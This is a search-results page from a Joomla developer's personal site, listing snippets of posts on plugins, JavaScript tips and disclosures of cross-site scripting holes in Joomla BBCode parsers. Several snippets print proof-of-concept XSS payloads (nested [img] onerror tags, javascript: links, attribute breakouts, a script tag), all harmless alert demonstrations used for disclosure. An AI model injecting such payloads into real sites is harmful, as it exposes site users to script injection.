Search
1.
(Joomla! Extensions/Joomla Plugins)
Joonami is a Joomla! plugin that executes custom JavaScript when a user enters the infamous Konami code. ...
2.
(Joomla! Extensions/Joomla Components)
MiniScript minifies and aggregates all JS & CSS from the JDocument object of Joomla! into a single file for each.
3.
(Code/Joomla!)
... new attributes into a link: style and onmouseover. Giving the link a large size, absolute positioning and a javascript trigger I made the contest site redirect back here.
After the hackme site was no ...
4.
(Comments/All)
Jason,
This is probably due to a JavaScript error, which causes the AJAX submission to fail. This is generally caused by templates or modules loading jQuery without setting it in noConflict mode, although ...
5.
(Other/Other)
This came on TV on Christmas day. I laughed so hard I nearly wet myself.
Video Content
This is a video. It requires the Adobe Flash plugin and JavaScript to view.
If this isn't a Discordian ...
6.
(Business/Services)
...
CSS
JavaScript
Mootools
jQuery
PHP
Flash
How much does this cost?
This service costs an hourly fee of $30.
How does it work?
You contact me with your requirements, explained ...
7.
(Code/Joomla!)
...
XSS 1: Nested [img] Tags
[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
XSS 2: JavaScript links
[url=javascript:alert('xss');]http://google.com[/url]
Requires ...
8.
(Code/Joomla!)
As part of a recent project, I needed to open a modal window using Javascript. Here's how I did it.
First, I made sure the modal behavior was loaded:
JHTML::_('behavior.modal');
Then, in my Javascript, ...
9.
(Code/JavaScript)
I was working on a bit of script today, and happened upon an interesting happenstance. I was trying to change the text of an element dynamically, and this text needed to include a non-breaking space. My ...
10.
(Other/Other)
... list. Feel free to submit any additions below.
URL Tag Injection
The [url] tag can sometimes be injected with XSS, although this will always require a user to click on the link:
[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
...
11.
(Code/Joomla!)
... default setting upon install.
To execute, simply post a new message. Either toggle the editor to 'off' or use the HTML Source editing button, insert your JavaScript, and submit!
<script>alert('xss');</script>
The ...
12.
(Code/Joomla!)
...
' onmouseover='alert(String.fromCharCode(88,83,83))
' style='color:expression(alert(String.fromCharCode(88,83,83)))
[img] BBCode Tag XSS
[img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
...
13.
(Code/Joomla!)
... there were going to be, and threw that error.
What I ended up doing is rewriting the JavaScript portion using MooTools markup, as the site I was doing this for always loaded MooTools for its operation. ...
14.
(Code/Joomla!)
... JavaScript function. I also appended a CSS style tag to handle invalid inputs (I could have added these to the administrator template, but I wanted to make sure this change survived a reinstall/upgrade). ...
15.
(Code/Joomla!)
... [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
Nested [url] XSS
[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
...
16.
(Code/JavaScript)
If you've ever done any scripting using the Mootools library that ships with Joomla, perhaps you've come across a situation where you needed to prevent a link from following it's assigned location. Mootools ...
17.
(Code/Joomla!)
Well, another XSS vulnerable BBCode implementation, this time on JTag Ticketing System. This is the exact same vulnerability I posted about earlier concerning WebAmoeba.
[url=javascript:alert('xss ...
18.
(Code/Joomla!)
... since when we have two links (a link without comprofiler and a link with comprofiler) this matches both
// but it is even worse when we do not remove javascript links...
$string = preg_replace('/\[(top)?url\](.*?)javascript(.*?)\[\/\\1url\]/si','<span ...
19.
(Code/Joomla!)
... onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
UPDATE: This XSS works in the signature field as well as the post message.
UPDATE 2: Nested [url] tags are similarly vulnerable, ...
20.
(Code/Joomla!)
I found a nice little exploit for WebAmoeba Ticket System 3.0.0, a Joomla help desk component. The vulnerability is with the BBCode library used to parse BBCode tags, as it does not strip javascript: urls ...
Latest Articles
Jeff ChannellCart
Your Cart is currently empty.
Keywords
Template Info
-
Name
Circles -
Creation Date
06/28/09 -
Author
Jeff Channell -
Author Email
me@jeffchannell.com -
Author URL
http://jeffchannell.com -
Version
0.0.2 -
Description
Circles